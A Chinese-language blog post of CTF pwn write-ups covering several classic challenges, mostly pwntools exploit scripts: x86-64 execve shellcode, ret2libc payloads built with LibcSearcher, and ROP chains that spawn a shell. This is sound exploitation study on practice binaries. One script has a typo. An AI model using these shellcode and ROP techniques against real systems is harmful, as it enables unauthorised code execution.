sniperoj-pwn100-shellcode-x86-64

23 字节 shellcode

"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

首先根据 gdb 确定偏移,然后把因为有个 leave 指令会破坏前面的,所以前面的填充为脏数据,然后加上返回地址占据的 8 位空间,确定在 buf_addr 后面 24+8 填充 shellcode

from pwn import *

sh = process('./shellcode')

shellcode_x64 = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

sh.recvuntil('[')

buf_addr = sh.recvuntil(']', drop=True)

buf_addr = int(buf_addr, 16)

payload = 'b' * 24 + p64(buf_addr + 32) + shellcode_x64

print payload

sh.sendline(payload)

sh.interactive()

train.cs.nctu.edu.tw:ret2libc

这道题开启了 NX 保护,然而运行的时候会把 puts 的地址跟 /bin/sh 的地址告诉我们,使用 pwntools 可以把地址提取出来,再根据 libcsearcher 查出 system 的地址,这样就可以 getshell 了

exp:

from pwn import *

from LibcSearcher import LibcSearcher

p=process('./pwn')

p.recvuntil('is ')

bin_addr = int(p.recvuntil('\n), 16)

print hex(bin_addr)

p.recvuntil('is ')

puts_addr = int(p.recvuntil('\n'), 16)

print hex(puts_addr)

libc=LibcSearcher('puts',puts_addr)

libc_base=puts_addr-libc.dump('puts')

sys_addr=libc_base+libc.dump('system')

payload2='a'*32+p32(sys_addr)+p32(1234)+p32(bin_addr)

p.sendline(payload2)

p.interactive()

讲一下 p.recvuntil('is ') 代表的是 "is" 之前的那一块,当下一个 recvuntil 的时候就会把这那块去掉了

把脚本里的第一个 p.recvuntil('is ') 替换成

print p.recvuntil('of ')

print p.recvuntil('is ')

就可以看出来作用是什么

ps. 正常会输出这一些("^C" 是 ctrl+c 退出造成的,不包括):

train.cs.nctu.edu.tw:rop

没找到题目,从大佬博客里面找到的,题目使用 nc 连上以后会输出这些 gadgets 需要自己去构造 payload

把 push 的那一些 16 进制转换一下

大佬说通过这些就可以构造出 payload 了

exp:我连不上。。。

from pwn import *

sh = remote('bamboofox.cs.nctu.edu.tw',10001)

payload = "9,9,1,10,9,3,3,12,4,12,2,2,8,8,8,8,8,0"

sh.sendline(payload)

sh.interactive()

2013-PlaidCTF-ropasaurusrex

没有 system 和 /bin/sh,通过 ret2libc 的方法在 libc 里面找到,这里注意一下第一次泄露的是 got 表的内容,写成了 plt 的,结果废了两个小时没看出来,还以为又出现了什么超出知识水平的操作,,CTF 需要视力!!

exp:

from pwn import *

from LibcSearcher import LibcSearcher

p=process('./rop')

elf=ELF('./rop')

write_plt=elf.plt['write']

write_got=elf.got['write']

payload='a'*140+p32(write_plt)+p32(0x80483F4)+p32(1)+p32(write_got)+p32(4)

p.sendline(payload)

write_addr=u32(p.recv(4))

libc=LibcSearcher('write',write_addr)

libc_base=write_addr-libc.dump('write')

sys_addr=libc_base+libc.dump('system')

bin_addr=libc_base+libc.dump('str_bin_sh')

payload1='a'*140+p32(sys_addr)+p32(1234)+p32(bin_addr)

p.sendline(payload1)

p.interactive()

Defcon 2015 Qualifier: R0pbaby

checksec 检查一下,发现是 64 位程序,所以参数应该是存储在 rdi 寄存器上

64 位程序当参数少于 7 个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9

通过 ROPgadget --binary /libc/x86_64-linux-gnu/libc.so.6 --only "pop|ret" | grep "rdi"

获取到 pop rdi ;ret 的地址:

通过程序自身提供的功能,可以获取到 libc 的地址与任意函数的地址

同时第三个功能存在溢出,经过计算溢出的长度为 8

写 exp:

from pwn import *

from LibcSearcher import *

p=process('./pwn')

elf=ELF('./pwn')

rdi_offset=0x0000000000021102

p.recvuntil(': ')

p.sendline('2')

p.recvuntil('symbol: ')

p.sendline('system')

p.recvuntil(': ')

sys_addr=p.recvuntil('\n',drop=True)

sys_addr=int(sys_addr,16)

libc=LibcSearcher('system',sys_addr)

libc_base=sys_addr-libc.dump('system')

bin_addr=libc_base+libc.dump('str_bin_sh')

rdi_addr=libc_base+rdi_offset

payload='a'*8+p64(rdi_addr)+p64(bin_addr)+p64(sys_addr)

p.recvuntil(': ')

p.sendline('3')

p.recvuntil('): ')

length=len(payload)

print length

print str(length)

p.sendline(str(length))

p.sendline(payload)

p.interactive()

大佬的 exp:

from pwn import *

from LibcSearcher import *

ropbaby = ELF('./pwn')

sh = process('./pwn')

context.word_size = 64

def getfuncaddress(func):

    sh.recvuntil(': ')

    sh.sendline('2')

    sh.recvuntil('symbol: ')

    sh.sendline(func)

    sh.recvuntil(': ')

    addr = sh.recvuntil('\n', drop=True)

    return int(addr, 16)

def addropbuff(payload):

    sh.recvuntil(': ')

    sh.sendline('3')

    sh.recvuntil('): ')

    length = len(payload)

    sh.sendline(str(length))

    sh.sendline(payload)

rdi_ret_offset = 0x0000000000021102

system_addr = getfuncaddress('system')

libc = LibcSearcher('system', system_addr)

libc_base = system_addr - libc.dump('system')

binsh_addr = libc.dump('str_bin_sh') + libc_base

rdi_ret = rdi_ret_offset + libc_base

print hex(system_addr), hex(binsh_addr), hex(rdi_ret)

payload = flat(['b' * 8, rdi_ret, binsh_addr, system_addr])

addropbuff(payload)

sh.interactive()

【二进制】CTF-Wiki PWN里面的一些练习题(Basic-ROP篇)的更多相关文章

  1. [二进制漏洞]PWN学习之格式化字符串漏洞 Linux篇

    目录 [二进制漏洞]PWN学习之格式化字符串漏洞 Linux篇 格式化输出函数 printf函数族功能介绍 printf参数 type(类型) flags(标志) number(宽度) precisi ...

  2. 【CTF】Pwn入门 XCTF 部分writeup

    碎碎念 咕咕咕了好久的Pwn,临时抱佛脚入门一下. 先安利之前看的一个 Reverse+Pwn 讲解视频 讲的还是很不错的,建议耐心看完 另外感觉Reverse和Pwn都好难!! 不,CTF好难!! ...

  3. BIT 常态化在线CTF系统 pwn题目

    偶然得到这个平台,发现是BIT的CTF平台,应该是平时的阶段性的训练题目.看了看题,其他方向的题目感觉都是入门题,但是pwn题目,发现还是比入门题难一点点的,来记录一下. pwn1 栈上任意位置的读写 ...

  4. 一步一步pwn路由器之路由器环境修复&&rop技术分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 拿到路由器的固件后,第一时间肯定是去运行目标程序,一般是web服务 ...

  5. PWN二进制漏洞学习指南

    目录 PWN二进制漏洞学习指南 前言 前置技能 PWN概念 概述 发音 术语 PWN环境搭建 PWN知识学习途径 常见漏洞 安全机制 PWN技巧 PWN相关资源博客 Pwn菜鸡小分队 PWN二进制漏洞 ...

  6. CTF学习资料总结

    网络攻防大作业学习方向思路 一直对CTF比赛有参与的兴趣,但由于课程比较多,一直没有足够的时间系统的去了解与训练.所以我想利用接下来的几周时间对CTF比赛经行练习.并找到自己所擅长或感兴趣的方向深入研 ...

  7. CTF:从0到1 -> zero2one

    本篇blog首发0xffff论坛(CTF:从0到1->zero2one - 0xFFFF),中间有各位大佬补充,搬到了个人博客CTF:从0到1 -> zero2one | c10udlnk ...

  8. 【pwn】学pwn日记——栈学习(持续更新)

    [pwn]学pwn日记--栈学习(持续更新) 前言 从8.2开始系统性学习pwn,在此之前,学习了部分汇编指令以及32位c语言程序的堆栈图及函数调用. 学习视频链接:XMCVE 2020 CTF Pw ...

  9. PWN INTEGER OVERFLOW 整数溢出

    0x00      Preview Last few passage I didn't conclude some important points and a general direction o ...

随机推荐

  1. [loj3278]收获

    人的移动之间会相互影响,因此不妨看成果树逆时针移动,显然果树之间独立 考虑建图:1.每一棵果树向其逆时针旋转后第一个人连边:2.每一个人向其逆时针旋转不小于$C$的第一个人连边(即下一个摘的人),边权 ...

  2. Linux下Zabbix5.0 LTS添加自定义监控项

    自定义监控项 zabbix本身提供了很多可选的监控项,可以满足绝大部分的监控需求.有时候由于业务需求,需要自定义监控项. 下面以创建mysql自定义监控项为例,分享如何创建zabbix自定义监控项. ...

  3. 不用Spring Boot的痛苦是什么?用了Spring Boot以后的好处是什么?

    1.不用Spring Boot的痛苦是什么? (1)各种技术整合在一起,版本混乱,大量依赖自己去找,依赖冲突 (2)基于xml格式的配置文件,对各种技术框架进行大量的繁琐配置,mvc-servlet. ...

  4. poi上传下载

    本教程只实现poi简单的上传下载功能,如需高级操作请绕行! <!--poi start--> <dependency> <groupId>org.apache.po ...

  5. 洛谷 P7879 -「SWTR-07」How to AK NOI?(后缀自动机+线段树维护矩乘)

    洛谷题面传送门 orz 一发出题人(话说我 AC 这道题的时候,出题人好像就坐在我的右侧呢/cy/cy) 考虑一个很 naive 的 DP,\(dp_i\) 表示 \([l,i]\) 之间的字符串是否 ...

  6. [Codeforces Global Round 14]

    打挺差的. 不过\(C,D\)一眼秒了,大概是对这几个月努力的一个结果? \(B\)玄学错误挂了两发. 脑子痛然后打到一半就去睡觉了. -------------------------------- ...

  7. Atcoder Beginner Contest 164 E Two Currencies(拆点+最短路)

    题目链接 题意:有 \(n\) 个城市,它们由 \(m\) 条双向道路连接,保证它们能够彼此到达.第 \(i\) 条道路连接 \(u_i,v_i\),需要花费 \(x_i\) 个银币,耗费 \(t_i ...

  8. Codeforces 1461F - Mathematical Expression(分类讨论+找性质+dp)

    现场 1 小时 44 分钟过掉此题,祭之 大力分类讨论. 如果 \(|s|=1\),那么显然所有位置都只能填上这个字符,因为你只能这么填. scanf("%d",&n);m ...

  9. 洛谷 P6478 - [NOI Online #2 提高组] 游戏(二项式反演+树形 dp)

    题面传送门 没错这就是我 boom0 的那场 NOIOL 的 T3 一年前,我在 NOIOL #2 的赛场上折戟沉沙,一年后,我从倒下的地方爬起. 我成功了,我不再是从前那个我了 我们首先假设 A 拥 ...

  10. Environment Modules 简明教程

    Environment Modules 简明教程 1. Modules 简介 在 Linux 超算平台上,通常会安装有不同版本的多种编译器和其他软件等,如常用的编译器有 intel 和 gnu,常用的 ...